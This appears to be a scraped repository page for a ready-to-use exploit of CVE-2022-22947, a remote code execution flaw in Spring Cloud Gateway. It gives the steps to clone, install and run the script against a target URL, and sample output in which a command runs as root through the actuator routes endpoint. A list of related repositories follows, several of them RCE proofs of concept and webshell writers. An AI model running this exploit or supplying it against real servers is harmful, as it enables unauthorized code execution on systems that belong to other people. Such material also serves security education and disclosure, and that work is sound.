Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)

Overview

Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)

CVE: CVE-2022-22947
CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947)
Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.

Usage

git clone https://github.com/carlosevieira/CVE-2022-22947
cd CVE-2022-22947
pip3 install -r requirements.txt
python3 exploit.py http://target 'id'
[email protected]:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id'

    ###################################################
    #                                                 #
    #   Exploit for CVE-2022-22947                    #
    #   - Carlos Vieira (Crowsec)                     #
    #                                                 #
    #   Usage:                                        #
    #   python3 exploit.py <url> <command>            #
    #                                                 #
    #   Example:                                      #
    #   python3 exploit.py http://localhost:8080 'id' #
    #                                                 #
    ###################################################
    
[+] Stage deployed to /actuator/gateway/routes/rtxhovup
[+] Executing command...
[+] getting result...
[+] Stage removed!
uid=0(root) gid=0(root) groups=0(root)

References

https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/

https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published

https://tanzu.vmware.com/security/cve-2022-22947

You might also like...

Spring-0day/CVE-2022-22965

Spring-0day/CVE-2022-22965

CVE-2022-22965 Spring Framework/CVE-2022-22965 Vulnerability ID: CVE-2022-22965/CNVD-2022-23942/QVD-2022-1691 Reproduce the vulnerability docker pull

Apr 5, 2022

Repository for content related to the final course project of team 04 of the Deep Learning (Spring '22) course at NYU Courant.

VICReg and FasterRCNN for Object Detection (Self Supervised Learning) This is the code repository for object detection using self supervised methods -

May 17, 2022

A Spring '83 Server

Let's Dance 💃 Let's Dance is a humble Spring '83 server written in django. Now live at https://spring83.mozz.us Requirements python 3.10 a strong con

Nov 13, 2022

My first attending to the spring challenges :tada::rocket:.

My first attending to the spring challenges :tada::rocket:.

Codingame spring 2022 🎮 Introduction video by Mathis Hammel: The challenge pits two players against each other on a rectangular map. They each get 1

Nov 15, 2022

Project-01 of ENPM 673 - Perception for Autonomous Robots (Spring '22)

Project-01 of ENPM 673 - Perception for Autonomous Robots (Spring '22)

Superimposing a Virtual Cube on an AR Tag Project-01 for the course ENPM673: Perception for Autonomous Robots (Spring 2022). Tag Detection Video Super

Sep 16, 2022

Litecord is an open source, clean-room design reimplementation of Discord's HTTP API and Gateway in Python 3.

Litecord is an open source, clean-room design reimplementation of Discord's HTTP API and Gateway in Python 3.

Litecord is an open source, clean-room design reimplementation of Discord's HTTP API and Gateway in Python 3.

Oct 31, 2022

Build API with ASGI in AWS Lambda with API Gateway HTTP API or REST API, or with Function URL ✨

asgi-aws Build API with ASGI in AWS Lambda with API Gateway HTTP API or REST API, or with Function URL ✨ Installation pip install asgi_aws Example Cre

Sep 23, 2022

Uses Stripe's Payment Gateway to process a list of cards

ℹ️ About Stripe-Gateway-Example ❓ What is it? This Program uses Stripe's Payment Gateway to process a list of cards from a text file. ⚙️ Installation

Aug 7, 2022

🌐 - Change your IP address with the Tor gateway

🌐 - Change your IP address with the Tor gateway

Auto-Chang-IP 🌐 - Change your IP address with the Tor gateway Tested on Kali Linux 2022 Ubuntu 2022 Installation Using Sudo SU Linux ROOT # Update &

Oct 31, 2022
Owner
Crowsec Edtech
Cyber Security Education Company
Crowsec Edtech
Spring4Shell - Spring Core RCE - CVE-2022-22965

Spring Core RCE - CVE-2022-22965 After Spring Cloud, on March 29, another heavyweight vulnerability of Spring broke out on the Internet: Spring Core R

Malte Gejr 115 Nov 15, 2022
CVE-2022-22965 : about spring core rce

CVE-2022-22965: Spring-Core-Rce EXP 特性: 漏洞探测(不写入 webshell,简单字符串输出) 自定义写入 webshell 文件名称及路径 不会追加写入到同一文件中,每次检测写入到不同名称 webshell 文件 支持写入 冰蝎 webshell 代理支持,可

东方有鱼名为咸 53 Nov 9, 2022
Another spring4shell (Spring core RCE) POC

Spring4shell RCE vulnerability This vulnerability affects Spring Core and allows an attacker to send a specially crafted HTTP request to bypass protec

Eslam Salem 2 Apr 4, 2022
[PoC] Atlassian Confluence (CVE-2022-26134) - Unauthenticated OGNL injection vulnerability (RCE)

CVE-2022-26134 - OGNL injection vulnerability. Script proof of concept that exploits the remote code execution vulnerability affecting Atlassian Confl

Samy Younsi 258 Aug 24, 2022
App with Server Side Template Injection (SSTI) vulnerability - in Flask. For web penetration testing / ethical hacking. Possible RCE :)

Vulnerable Web App: ssti-flask-hacking-playground This is small application vulnerable to Server Side Template Injection (SSTI) in Flask/Jinja2. The v

Filip Karczewski 8 Nov 21, 2022
Ever found and RCE but just can't seem to get a shell? Well we do have RCE right?? Let's Exfiltrate!!

RCE-Exfiltration-Framework Ever found and RCE but just can't seem to get a shell? Well we do have RCE right?? Let's Exfiltrate!! How It Works This scr

Yerodin Richards 1 Jul 7, 2022
Spring-Cloud-Function-SpEL_POC_EXP

Spring-Cloud-Function-SpEL Spring-Cloud-Function-SpEL-POC thank @f0ng 此代码是利用sleep,确认是否存在漏洞,延时设置3s,可以按照所处环境修改延时时间。 This program is to use sleep to conf

warin9 12 Nov 9, 2022
Graduation Project for AW Academy x Accenture - Azure Cloud Engineer Spring 2022

Introduction Landing Zone for Fortmu Ltd Application Development & Production Team in the Microsoft Azure Cloud platform. With this Landing Zone you w

Noora Kataja 1 May 20, 2022
Code repository for GCT535 Sound Technology for Multimedia (Spring 2022)

gct535-2022 Code repository for GCT535 Sound Technology for Multimedia (Spring 2022) Instruction to set up the course Conda virtual environment We wil

Juhan Nam 5 Jun 18, 2022
Pinyin input method in Python. Homework of Intro. to AI course, 2022 Spring @THU.

input-method Pinyin input method in Python. Homework of Intro. to AI course, 2022 Spring @THU. The Principle 隐 Markov 模型(HMM) Hidden Markov Model (HMM

西北望长安 6 Apr 9, 2022